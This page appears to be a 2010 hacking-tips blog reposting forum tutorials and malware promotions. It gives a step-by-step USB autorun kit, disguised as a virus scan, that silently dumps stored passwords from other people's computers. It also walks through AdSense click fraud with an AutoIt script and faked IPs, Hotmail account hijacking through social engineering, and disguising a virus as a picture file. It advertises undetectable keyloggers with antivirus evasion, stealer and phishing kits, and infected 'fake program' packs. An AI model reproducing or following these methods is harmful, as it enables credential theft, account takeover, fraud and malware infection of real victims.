[meta content='0;url=http://www.mediapluss.com' http-equiv='refresh'/> 2010-05-09 ~ Hacking & Computer Tips

Auto Webpage Clicket


Auto Webpage Clicker is a kind of software which can automatically click the web pages in batch. It can automatically click a batch of web pages you added with flexibility, and you can set the cycle number and the switching time of the clicker by yourself. It is easy, simple, no hassle with totally automatically operation and deflated in the system tray, even benefit for the people who know little computer

http://rapidshare.com/files/23980978...icker.v1.0.rar

http://hotfile.com/dl/4789157/724935....v1.0.rar.html

http://www.uploading.com/files/IHTXN....v1.0.rar.html


Changing the name of the Start Menu button



1. Run Resource Hacker, and open \windows\explorer.exe
2. Click String Table > 37 > 1033 (XP-style button)
3. Replace "start" with whatever you want ("hello", in the picture above)
4. Click the Compile Script button. Repeat steps 3 and 4 for String table > 38 > 1033 (Classic-style button)
5. Save the file (File>Save). Hit Cancel then Yes when Windows File Protection pops up.
Note: If an error message pops up when saving the file, kill explorer.exe (Clt-Alt-Del > Processes > explorer.exe > End Process > File > New Task), repeat step 5 (save the file in Resource Hacker), and restart explorer.exe (Clt-Alt-Del > Processes > explorer.exe > End Process > File > New Task > explorer > OK).


Changing the icon of the Start Menu button :

1. Click Bitmap > 143 > 1033
2. Click Action > Replace bitmap > Open file with new bitmap (the new picture must be 25x20, and have 16 million colors).
3. Select a picture file, click Replace, then save (File>Save) your work. Hit Cancel then Yes when Windows File Protection pops up.
4. Close Resource Hacker If you do not want to reboot to see your new button, kill then restart explorer.exe (Clt-Alt-Del > Processes > explorer.exe > End Process > File > New Task > explorer > OK)


Enjoy.....


Ghost Keylogger 3.80




Ghost Keylogger is an invisible easy-to-use surveillance tool that
records every keystroke to an encrypted log file. The log file can be
sent secretly with email to a specified receiver. Ghost Keylogger also
monitors the Internet activity by logging the addresses of visited
homepages. It monitors time and title of the active application; even
text in edit boxes and message boxes is captured.


Hack passwords using usb


How to hack passwords using USB Drive


Today I will show you how to hack Passwords using an USB Pen Drive.
As we all know, Windows stores most of the passwords which are used on a daily basis, including instant messenger passwords such as MSN, Yahoo, AOL, Windows messenger etc.
Along with these, Windows also stores passwords of Outlook Express, SMTP, POP,
FTP accounts and auto-complete passwords of many browsers like IE and Firefox.
There exists many tools for recovering these passswords from their stored places.
Using these tools and an USB pendrive you can create your own rootkit to hack
passwords from your friend?s/college Computer.

We need the following tools to create our rootkit:

MessenPass: Recovers the passwords of most popular Instant Messenger programs:
MSN Messenger, Windows Messenger, Yahoo Messenger, ICQ Lite 4.x/2003, AOL
Instant Messenger provided with Netscape 7, Trillian, Miranda, and GAIM.
http://www.nirsoft.net/utils/mspass.html



Mail PassView: Recovers the passwords of the following email programs: Outlook
Express, Microsoft Outlook 2000 (POP3 and SMTP Accounts only), Microsoft Outlook
2002/2003 (POP3, IMAP, HTTP and SMTP Accounts), IncrediMail, Eudora, Netscape
Mail, Mozilla Thunderbird, Group Mail Free.
Mail PassView can also recover the passwords of Web-based email accounts (HotMail,
Yahoo!, Gmail), if you use the associated programs of these accounts.
http://www.nirsoft.net/utils/mailpv.html



IE Passview: IE PassView is a small utility that reveals the passwords stored by
Internet Explorer browser. It supports the new Internet Explorer 7.0, as well as
older versions of Internet explorer, v4.0 - v6.0
http://www.nirsoft.net/utils/interne..._password.html



Protected Storage PassView: Recovers all passwords stored inside the Protected
Storage, including the AutoComplete passwords of Internet Explorer, passwords of
Password-protected sites, MSN Explorer Passwords, and more?
http://www.nirsoft.net/utils/pspv.html



PasswordFox: PasswordFox is a small password recovery tool that allows you to view
the user names and passwords stored by Mozilla Firefox Web browser. By default,
PasswordFox displays the passwords stored in your current profile, but you can easily
select to watch the passwords of any other Firefox profile. For each password entry,
the following information is displayed: Record Index, Web Site, User Name,
Password, User Name Field, Password Field, and the Signons filename.
http://www.nirsoft.net/utils/passwordfox.html

------------------------------------------------------------------------------------------------

Here is a step by step procedre to create the password hacking toolkit:
NOTE: You must temporarily disable your antivirus before following these steps.
1. Download all the 5 tools, extract them and copy only the executables(.exe files)
into your USB Pendrive.
ie: Copy the files - mspass.exe, mailpv.exe, iepv.exe, pspv.exe and passwordfox.exe
into your USB Drive.
2. Create a new Notepad and write the following text into it:
Code:
[autorun]
open=launch.bat
ACTION= Perform a Virus Scan

save the Notepad and rename it from
New Text Document.txt to autorun.inf
Now copy theautorun.inf file onto your USB pendrive.
3. Create another Notepad and write the following text onto it:
Code:
start mspass.exe /stext mspass.txt
start mailpv.exe /stext mailpv.txt
start iepv.exe /stext iepv.txt
start pspv.exe /stext pspv.txt
start passwordfox.exe /stext passwordfox.txt

save the Notepad and rename it from

New Text Document.txt to launch.bat
Copy the launch.bat file also to your USB drive.
Now your rootkit is ready and you are all set to hack the passwords. You can use this
pendrive on your friend?s PC or on your college computer. Just follow these steps
1. Insert the pendrive and the autorun window will pop-up. (This is because, we have
created an autorun pendrive).
2. In the pop-up window, select the first option (Perform a Virus Scan).
3. Now all the password hacking tools will silently get executed in the background
(This process takes hardly a few seconds). The passwords get stored in the .TXT
files.
4. Remove the pendrive and you?ll see the stored passwords in the .TXT files.
This hack works on Windows 2000, XP,Vista and 7
NOTE: This procedure will only recover the stored passwords (if any) on the
Computer.


140+ Fake Programs! (20MB)


I wanted to share this with you guys.

DOWNLOAD Share Cash
DOWNLOAD Mediafire

PASSWORD: Because of all the leechers you need to PM me and have a minimum of 50 posts.

Pack contains:
140+ Fake Programs!
It's only 19.2MB!

Screenshots:
----------------------------------------------------------------------------------------------

NVT Scan:
File Info

Report date: 2010-03-27 00:40:36 (GMT 1)
File name: Fake_Programs.rar
File size: 20134110 bytes
MD5 Hash: ffe960734b1ca4c71c6c425f378b3d20
SHA1 Hash: 16fbba15d54eb9085de998333b4078f2c5200984
Detection rate: 2 on 21 (10%)
Status: INFECTED

Detections

a-squared - Exploit.Win32.Nuker.VB!IK
Avast - -
AVG - -
Avira AntiVir - -
BitDefender - -
ClamAV - -
Comodo - -
Dr.Web - -
Ewido - -
F-PROT6 - -
G-Data - -
Ikarus T3 - Exploit.Win32.Nuker.VB
Kaspersky - -
McAfee - -
NOD32 - -
Panda - -
Solo - -
TrendMicro - -
VBA32 - -
VirusBuster - -
Zoner - -

Scan report generated by
NoVirusThanks.org

Link: http://scanner.novirusthanks.org/analysi...tcy5yYXI=/


Mbs of fake programs


Hey HackForums Here is a List of all the programs that I got from the forum and forums There are 138 Programs


[Image: fakeprograms.jpg]

The picture Does not show them all but They are all the post of the forums over time i was here


Here are some of the Programs



-----------------------------
[*]Cod_Mw2_Keygen-Idecrypt
[*]Camfrog Valid Key Generator
[*]Convert X to DVD
[*]Pro Show Gold Generator Keys
[*]Nexon_Card_Generator
[*]Panda Security 2010 Key Generator
[*]MSDN Admin
[*]Ninja Blade Key Generator
[*]Runescape_Stat_Changer
[*]PayPal_Account_Verifier
[*]Virtual DJ all Versions Keygen
[*]Wow Golden Eye
----------------------------------


(*Anti-N00b*)



[*]edit: Password: monster

File _67.7_mbs_Fake_Programs_137_Unpac received on 2010.04.18 06:02:21 (UTC)
Current status: Loading ... queued waiting scanning finished NOT FOUND STOPPED
Result: 0/40 (0%)
Loading server information...
Your file is queued in position: ___.
Estimated start time is between ___ and ___ .
Do not close the window until scan is complete.
The scanner that was processing your file is stopped at this moment, we are going to wait a few seconds to try to recover your result.
If you are waiting for more than five minutes you have to resend your file.
Your file is being scanned by VirusTotal in this moment,
results will be shown as they're generated.
Compact Compact
Print results Print results
Your file has expired or does not exists.
Service is stopped in this moments, your file is waiting to be scanned (position: ) for an undefined time.

You can wait for web response (automatic reload) or type your email in the form below and click "request" so the system sends you a notification when the scan is finished.
Email:

Antivirus Version Last Update Result
a-squared 4.5.0.50 2010.04.18 -
AhnLab-V3 5.0.0.2 2010.04.17 -
AntiVir 7.10.6.115 2010.04.16 -
Antiy-AVL 2.0.3.7 2010.04.16 -
Authentium 5.2.0.5 2010.04.16 -
Avast 4.8.1351.0 2010.04.17 -
Avast5 5.0.332.0 2010.04.17 -
AVG 9.0.0.787 2010.04.17 -
BitDefender 7.2 2010.04.18 -
CAT-QuickHeal 10.00 2010.04.17 -
ClamAV 0.96.0.3-git 2010.04.18 -
Comodo 4634 2010.04.18 -
DrWeb 5.0.2.03300 2010.04.18 -
eSafe 7.0.17.0 2010.04.15 -
eTrust-Vet 35.2.7431 2010.04.17 -
F-Prot 4.5.1.85 2010.04.17 -
F-Secure 9.0.15370.0 2010.04.16 -
Fortinet 4.0.14.0 2010.04.17 -
GData 19 2010.04.18 -
Ikarus T3.1.1.80.0 2010.04.18 -
Jiangmin 13.0.900 2010.04.18 -
Kaspersky 7.0.0.125 2010.04.18 -
McAfee 5.400.0.1158 2010.04.18 -
McAfee-GW-Edition 6.8.5 2010.04.18 -
Microsoft 1.5605 2010.04.18 -
NOD32 5037 2010.04.18 -
Norman 6.04.11 2010.04.16 -
nProtect 2010-04-17.01 2010.04.17 -
Panda 10.0.2.7 2010.04.17 -
PCTools 7.0.3.5 2010.04.18 -
Prevx 3.0 2010.04.18 -
Rising 22.43.06.01 2010.04.18 -
Sophos 4.52.0 2010.04.18 -
Sunbelt 6188 2010.04.17 -
Symantec 20091.2.0.41 2010.04.18 -
TheHacker 6.5.2.0.264 2010.04.18 -
TrendMicro 9.120.0.1004 2010.04.15 -
VBA32 3.12.12.4 2010.04.15 -
ViRobot 2010.4.17.2282 2010.04.17 -
VirusBuster 5.0.27.0 2010.04.17 -

Download From Here


AdSense Hacking Tutorial V4


AdSense is the best PPC(pay-per-click) programme in the world. Because it have a higher paying rate. So if you are using AdSense for a long time and cant make any money with it. You need help. In this tutorial, you will learn what is adsense, how adsense works and how you can cheat them.
How AdSense works, the basics
You put ads on your website, your visitor see those ads. and when they click on them you get money. if you are thinking that the whole thing is simple as that; then wake up, your in a dream.
Google place their ads, anyone can see them but google will start tracing them if they click on the ads. but the million dollar question is how they trace the clicker? here how they do it:
1. By Cookie.
2. By IP address.
3. By Referrer.
4. By User-agent.
5. Screen Resolution.
We will try to beat google in this tutorial. By hiding or faking those informations.
Now to the earing section. How google calculate earing. if you get your first visitor, your impression will be 1. Impression means now many times your ads are shown to the public. google will calculate the impressions and the clicks, and pay you that amount. But if your 1st visitor clicked on a ad, it will be suspicious. because google will do this calculation:
number of clicks (divided by) number of impression (%)
it will give a numerical result like 10% so google is calculating the ratio of the clicks and impressions. think that you have 13 impressions and 1 visitor clicked on a ad, so the calculation is
1 / 13% = 7.69230769
this number is called the CTR. but if you have 1 impression and 1 click your CTR will grow to 100. google will ban you if the CTR is higher then 10. [7-9 is safe]
Every ad has it own value. like an insurance ad, it is a 14$ ad. google will not pay that amount to you per click. if your CTR is 7, google will divide the amount with CTR. and you will get the result. like:
14/7=2$/per click
so getting the high paying ads are important. i will show you how to get it.
Getting Started
1: Get an adsense account from http://www.adsense.com
they will approve your account in 1-2 days.
2: create a new php or html page and paste there the adsense code.
3: download “high paying keywords” and paste it there.
http://www.mediafire.com/?j5nezdj2y22
4. you can add something cool to your website, like counter or “what my ip”
note: remember to keep it simple. don’t make it so heavy.
You will need
1. Autoit. Download: www.autoitscript.com/AutoIt/
2. FireFox Addons:
a) User-agent switcher Download: https://addons.mozilla.org/en-US/firefox/addon/59
b) RefControl Download:
https://addons.mozilla.org/en-US/firefox/addon/953
3. Hide my ip. Download: http://www.hide-my-ip.com/
4. Referrer list and user-agent list.

Download from


http://www.megaupload.com/?d=HDDN01UR
http://www.megaupload.com/?d=46UOQO46

NOTE: The main thing is creating the autoit script.
Getting the Impression
Steps:
1. Download autoit and install.
2. Right click on your desktop and go to: New>Autoit V3 script
3. Now goto start menu>autoitV3>AutoIt Window Info
4. On the “AutoIt Window Info”, goto “mouse” tab.
5. install “hide my ip”. then drag it to your start menu.
6. Hover your mouse to “start menu”, you will see “Position” in the “AutoIt Window Info” like “35,761″. write down that to a piece of paper.
7. Then hover your mouse to the “hide my ip” in start menu. write the position on paper.
8. Now in the “SciTE Script Editor”, write this:
MouseClick(“left”, 42, 754, 1)
replace the position 42 & 754 with your start menu position.
9. Again write this:
MouseClick(“left”, 42, 754, 1)
replace the position 42 & 754 with your “hide my ip” position in start menu.
8. Now click on the icon of “hide my ip”. hide my ip will come up. Then hover your mouse to the “change ip” button. get the position.
then write:
MouseClick(“left”, 42, 754, 1)
replace the position 42 & 754 with your “hide my ip”s “change ip” button position.
9. now write:
Sleep(3000)
the mouse will pause for 3 seconds. in this 3 second “hide my ip” will change the ip.
10. Open FireFox, Hover your mouse to “Tools”, then to the “clear private data”
[remember to tweak the setting on tools to not to ask before deleting and chose cookies and offline data to delete] get the positions of “tools” and “clear private data”
Write:
MouseClick(“left”, 42, 754, 1)
MouseClick(“left”, 42, 754, 1)
replace the 2 positions with proper positions.
11. then hover mouse to the reload button on FireFox
get the position and write on the script editor.
12. then write this
Sleep(10000)
13. copy the whole script and then paste 5 times. Then change 5 “Sleep(7000)” to “Sleep(8000)” “Sleep(9000)” “Sleep(10000)” “Sleep(12000)”
this will give you random interval between each impression.
14. Copy the whole script again and paste 999999 times.[just kidding. paste it many time]
15. Run the script for 1 hour, it will give you about 300 impressions.
Getting the Clicks
1. Get a random referrer from the referrer.txt and double click on RefControl on Firefox.
click on “edit” then click “Custom” paste the referrer on the field.
2. Goto Tools>User agent switcher>Options>options….>user agnets>import
import the agent.xml file
then you will see a large list of user agent, chose any one of those.
3. Change your ip.
4. goto your site
5. Click on a ad.
6. Do NOT close the site immediately. if its a insurace ad fill up the forms with junk info and submite.
7. clear cookies and repeat the steps.


Hacker Kit 2010


Hacker Kit 2010


[Image: qobxwm.jpg]


Some tools which hackers require in daily life. I personally use most of these.

Yahoo Account Locker
Acunetix Vulnerability Scanner + Crack
Admin Finder
Auto Surfer
Angry Ip Scanner
Anonymity Pack
Ardamax 28 and 2.9 + serial
Binders
Brutus
Crypters
Cookie Stealer
Debugging Tool
Email Bomber
Exploit Scanner
Ip Scanners
Irc Spammer
Md5 Cracker
Msn Freezer
MySqli Dumper
Passstealer - Istealer 5 and other fud stealers
Phishers - A to Z
Port Scanner
Shells Pack A to Z shells
Supernova 5
Telnet Tools
Xss scanner
zer0 server Attacker


Download From Here

Password:
The7thSage


Reverting A Hotmail Account



Before we get started, I know there are LOADS of these about, but

with the high volume of noobs visiting HackForums, the old tut's get

pushed down pages, leaving noobs with no choice but to post a thread

'How do i crack a hotmail'. ALSO, all the tut's I've seen have missed

loads of key points.


So without any further ado...


-------------------------------------------------------------------------------------------------------------------------------------------------------------

Firstly you'll need a victim. Once you have this victim, I would recommend opening a text document with the following sections.

[Image: notepadempty.png]

In this you'll see all the fields you'll need to fill for the revert form.
You will NOT need to fill out all of these in order to revert an account.
I'll note the importance of each field as we go along.


Email:

This field should be filled in already. If you're confused to what to put here, just leave. OJ, try reading from start again.


Full Name:

Ok this is where the S/E(social engineering) begins. If you have the victim on Facebook, or some other social networking site, where you can acquire their details, then fill out the fields you can, and skip along to where relevant.

If you Don't have a resource of their details, then visit this site:
PIPL

[Image: ppls.png]

On here you can search people by various different means. In this case, we're going to use the email, as this is the only information we have at this point. So go to the email tab, type it in and hit search. IF the person has signed up to websites with this email, you should get a list of sites they've signed up to, and if the site has a little padlock next to the thumbnail pic, it means the profile is locked (you will need to be friends to view).

IMPORTANT NOTICE ABOUT pipl.com: This site is slightly unreliable. If you search once and nothing comes up, you could search again and get 10 results. So best to search several times to make sure you haven't missed anything. ALSO this site doesn't search on FACEBOOK, so after you've been on this, try logging into facebook and searching on there for your victim, and hope their profile is open to view. If this isn't the case, make a fake profile (preferably of the opposite sex), add a nice profile picture, add them and hope for the best.

If you can't get any information on your victim using the above methods, there's a good chance they don't use the email for anything, rendering it a useless hack. In which case you should try and find out their main email.

You can also try http://www.yasni.co.uk/ which is supposed to be a decent people search, but you cannot search by email, so this is to be used as a secondary search.

So by this point we should have covered:
Email, Full name, Date Of Birth, Country, State/County, so next...


Postcode/ZIP:

For the postcode, all you need to do is use the information you already have to your advantage. You should know which country and town they are from. So with this information, go to Google and type in the town + the words 'full postcode'. So for example, let's say the victim lived in Manchester, England. You would type 'Manchester full postcode' into the google search bar. Now in the results you should find full postcodes for that district, which should be located next to the boldly highlighted words that you searched. Here's an example:

[Image: postcode.png]

And as the full postcode/zip isn't as necessary, it won't matter that it isn't exactly what your victims actual postcode is. The only problem with this method is success rate may vary with country and area. I have done this many times with English and American towns and rarely had a problem.


IP & ISP:

This is the hardest bit, yet still not very difficult.
To acquire a victims IP, you have a couple of options:

1. Get the victim to send you an email. This can be done by sending them something that would interest them, or just simply something that puzzles them, deeming them certain to reply to satisfy their curiosity. I would usually send an email asking ''Do you remember me from (blabla)'', using the information you gathered before, you should know their location and interests. Also don't forget to put a decent 'Subject', you want them to open it, not think it's just some junk/spam. Once they've replied, you now want to extract their IP address from the email. This is how it's done.

Go to your inbox, right-click the mail from the victim and click ''View message source'' Should look like this...

[Image: sourceemail.png]

After this you should see a white page with a load of jibberish that is of no relevance. But this is where the IP address of your victim lays.
What you're looking for is ''X-Originating IP:'' and after this will be the victims IP. It should look like this

[Image: 43574313.png]

If you have trouble finding the IP on this page, just hit ctrl+f for Finder and type IP. Should be maximum of 3-5, scroll through each one and I'm sure you'll find it.

2. Your second option is to get the person on MSN (unless you already have them), and get them to interact with you. You can use this tool to make it easier.

IPGet 1.5

This link is 100% safe, not uploaded by me, but is from another thread. Can scan if you like, but this isn't important anyway as there is another way around this. I won't explain how IPGet works as it is very basic but basically you need to get the victim to send or receive a file from you, or get them to send you a voice clip. IPGet will collect the IP. Here's a link for a IPGet tutorial:

IPGet Tutorial

Excuse the language, as I couldn't find a decent english one, but just follow the visual steps he takes in using IPGet.

DO NOT use any links advertised to download IPGet off of youtube, as I can't certify they're safe. I'd rather use the link I provided or try the other method coming up.

For the other option follow these instructions:
Start>Run>CMD(or command)
Then command prompt will pop-up. In command prompt, type ''netstat -n'' (without quotations). You should get a list like this...

[Image: netstat.png]

But filled in with a little more numbers. Print screen and paste into paint.
Then you'll need to do the same as before, get the person to send or receive a file from you, preferably something decently big, as you'll need a little time. Once the file is active (sending), start>run>cmd>netstat -n again and print screen the page again. Now paste this into a NEW paint, and compare the two results. On the 2nd page there should be a new number to the list, this is the victims IP, so take it down and add it to your txt document you're compiling.

Lastly, your final option, is to visit:
MyIPTest.
From here all you need to do is send the victim a link, and it will log their IP once they've visited it. I won't explain how to use, as the site is pretty self explanatory.
DON'T FORGET to TunyUrl your link otherwise it will be too obvious and no-one will click it.
Thanks to bobblejim for this.

Ok so now the IP is covered, how do we get the ISP(Internet Service Provider). Well it's as easy as this. Go to:

IP Tracer Website

This is an IP tracer website, which can get you loads of details on a persons connection and even location, providing you know the IP.
So the page will look like this:

[Image: iptrack.png]

Key:-
1. Is where we are going to enter the IP of the victim. Then hit the ''Track IP, host or website'' button.
2. Is where all the information on the victim will appear once the tracking is complete.

In the list of information (no.2) you should see a line for 'My ISP'. This is the Internet Service Provider the victim is running from the tracked IP.

So the only fields you should have empty now are 'Last sign in', 'Contacts', 'Mail' & 'Nickname', so let's keep it moving...


Last Sign-In:

All you'll need to do for this, is simply go onto their Facebook, or one of the sites you found out they were signed up to earlier, and see when they were last active. If the source is unreliable, just say ''Yesterday'' for this field, because if they are an active computer-user there's a good chance they were on.


Contacts:

To get the victims contacts for the ''Messenger contacts'' and ''Hotmail address book'' fields, all you need to do is go to their Facebook, or main social networking site, if they have one, and look at who they are most active with, i.e. who mostly leaves comments on their wall, likes their statuses etc. Good chance these are their closest friends, and therefore have them on MSN. You will need to collect the friends names AND emails if possible, although this isn't of extreme importance. Just so we're clear, MSN contacts and Hotmail address book contacts are the same, if you add someone to MSN, they will go to your address book.


Mail:

For the mail, you need to know some old mail they would have received in their hotmail inbox. All you need to do for this is visit http://www.pipl.com/ again (don't forget to search several times for more accurate results), and for all the results you get, that means they are signed up to the site, which in turn means they must have received registration emails from these websites. So take all these down and add them to your txt.


Nickname:

And finally we get to Nickname. Nice and simple, just add them on MSN, from another account, or if you have them already that's all good. Take down their screen/display name, and add it to your txt.

Ok so we should now have a complete form ready to revert this account.
Your txt. should look something like this.
[Image: lastform.png]
Fake details, so no trying anything noobs Nono

So here's a list of the fields and level of importance:

Email: Extreme Importance for obvious reasons...
Full name: Very important
D.O.B: Very important
Country: Important
County/State: Not very important
Postcode: Not very important
IP&ISP: Not important atall (though they will help your case alot)
Last sign-in: Not very important, but don't overstep your mark
Contacts: Important that you get them right
Mail: Important that you get them right
Nickname: Important that you get it right


IF YOU DON'T KNOW A FIELD, SIMPLY SAY 'I DON'T KNOW' or 'I CANNOT REMEMBER'

Some fields aren't as important as others, although if you attempt a guess and get it wrong, you'll pay severely by failing this whole revert.


REMEMBER: When filling out this form, it's going to an ACTUAL PERSON, not being auto-read by some bot, so at the bottom in the ''additional info'' box, make the most of it. Let them know you're desperate for your account back for whatever reason. All this will help.


Finally, the whole point of this tutorial, here is the revert link:
Revert Link
Bookmark it, as it's not very easy to memorise


DoctorLogger v4.0


DoctorLogger v4.0


I was going to post my 3.0 version here, but some noob posted it before I had the chance. So here is the 4.0 version of my keylogger.

[Image: 11kvxnm.png]

Features:
FUD
Antis
----
Anubis
BitDefender
Kaspersky
Keyscrambler
Malwarebytes
NOD32
Norman
Ollydbg
Outpost
Wireshark
AVG
Avast
VirtualPC
Comodo
----
Startup
Encrypt mail info
Downloader
Encrypt Dl link
USB Spread
Disable TaskManager
File Binder
Icon Changer
Stealers
Fake Error
Force Steam Login
Nice GUI
Delete Cookies (FF & IE)
Delete Cache (FF & IE)
Blocks Av Sites
Stub Updater

Server/Stub Scan:
Report date: 2010-05-09 05:08:20 (GMT 1)

File name: stub.exe
File size: 38400 bytes
MD5 Hash: 4f108d479bfc96f22de9af9d871c6294
SHA1 Hash: 3bf4d9538380f6305be732fb01b03d4d896a960a
Detection rate: 0 on 20 (0%)
Status: CLEAN

Detections

a-squared - -
Avast - -
AVG - -
Avira AntiVir - -
BitDefender - -
ClamAV - -
Comodo - -
Dr.Web - -
F-PROT6 - -
G-Data - -
Ikarus T3 - -
Kaspersky - -
McAfee - -
NOD32 - -
Panda - -
Solo - -
TrendMicro - -
VBA32 - -
VirusBuster - -
Zoner - -

Scan report generated by
NoVirusThanks.org

Download Link


Ecodsoft Keylogger v2.1 Incl Keygen-Lz0


Ecodsoft Keylogger v2.1 Incl Keygen-Lz0



Ecodsoft Keylogger is very powerful monitoring software which could record and log all the computer activity. This key logger tool work in stealthy mode and completely invisible to other people. It could not only record key stroke but the software informations such as applications launched, websites visited, and popular Instant Messenger log.

As the best computer monitor and logger software, Ecodsoft Keylogger is very easy to use with its friendly UI, even for the beginners. After install on any PC you want, it could record and save allthe activity. So it could be excellent parent control and surveillance tool and also could work as a employee monitor.Now you could download it for free and try it easily!

Key Features:

Best keystroke recorder
» Secretly record all keystrokes typed by computer users in total stealth.

Sends the report to the specified email addresses.
» Log and save all the message on the PC, and could send to you via email secretly.

Save all the IM messages:
» Skype chat logger
» MSN Messenger logger
» Yahoo Messenger logger
» AIM logger
» ICQ logger

Record all the websites opened and other software usage history:
» Myspace log
» Facebook log
» Document open log
» Clipboard content

Take screenshot and save on the PC.
» The key logger and monitor could record screen and save as bmp files,
» so you could browse and check them anytime.

Safe to install without spam and best service!

System Requirement:
» Windows XP, Vista or NT/2000/2003/2008 Server, Windows 7

Download 5.25 MB (Setup + Ecodsoft Keylogger v2.1 Keygen-Lz0)

Code: http://hotfile.com/dl/35432952/d44dc4c/REGGOLYEKTFOSDOCE212121.rar.html
PASSWORD
smartworld


[Tutorial] Hide your Virus in a Picture File [New Method]




Items Needed:
  • Any Icon Changer
  • A Binder
  • A Brain

1) Create your virus. We shall call it 'server1.exe' for now.

[Image: server1.png]

2) Get any picture file you want to distribute.

3) Bind the 'server1.exe' and your picture file with any binder, we'll call the binded file 'virus1.exe'.

[Image: bindere.th.png]

3.5) I reccomend Easy Binder 2.0, which comes with a bytes adder and a icon extractor, aswell as some really good packing options. I've uploaded it, virus free, to: http://www.mediafire.com/?igjy4dnn0zb

4) Be sure you have 'Hide common extensions' unchecked in your Folder Options.

[Image: known.th.png]

5) Change the 'virus1.exe' to '%Picturename%.jpeg - %Email/Web Address%.com'. For example, we'll call it 'HPIC_119.jpeg - test@test.com'.

[Image: hpic.th.png]

.com works the same as .exe, except fewer people actually know that's what it really is.

6) If you plan on distributing your virus via MSN, please skip to 7. If you plan on distributing your virus via file upload sites, please skip to 8.

6.5) I reccomend Icon Extractor V3.8 FULL with Serial, that can be downloaded from this Post : Click Here


[Image: iconchange.th.png]

7) You will now need to change the icon from that ugly box. Find the picture you added to the file, and make it an icon. How? Find one of the various online Picture to Icon converters. Once your picture is a .ico, use your Icon Changer program to change the icon of the file to the .ico you just made from the picture. When you send it to people on MSN, it will show a small box of the picture inside.

[Image: msnz.th.png]

8) You will not need to change the icon from that ugly box. Using your Icon Changer program, find the .jpeg icon, and change the ugly box to the .jpeg icon.

[Image: downloadfq.th.png]

9) Conclusion. Your file will now look like a legit picture to 9/10 people. Some people do know that .com is an extension, but the average computer user will not see any difference, and will download it without hesitation.


Over 8000 icons with Icon Changer 3.8 including serial !


Over 8000 icons with Icon Changer 3.8 including serial !

Icon Changer is a software application that makes changing icons on the desktop fun and easy.
It's a hassle-free way to personalize your desktop without submerging yourself into reading books about advanced computing. Simply click the icon you want to change, point at the one you like and that's all. Why change icons? To make navigation easier, to group similar applications together, to customize and spice up your desktop, of course. Try it!.

Moreover, you can use IconChanger to change personal file icons. You can now assign an icon of your choice to each and every file on your computer. Personalize your computing experiences to make using computer a bit easier and much more convenient.

[Image: so278g.gif]


Download :


Counter

free counters

Trafic

Hacking and Computer Tip Trick, Computers, IT Forum, IT Tips, Hacking tutorials, Credit Card Hacking, Face Book Hacking, Ftp Server On Your Pc, Get Adsense, Get Email alerts, Gmail Hacking, Google Tips, Hacking YouTube, Internet Tips, IP Address, Mobile.

Partners

Pak Gsm

Bookmark

Add us to your technorati favorites
 

Hacking & Computer Tips Copyright © 2010 Hacking and Computer Tips is Designed by Hack pc tips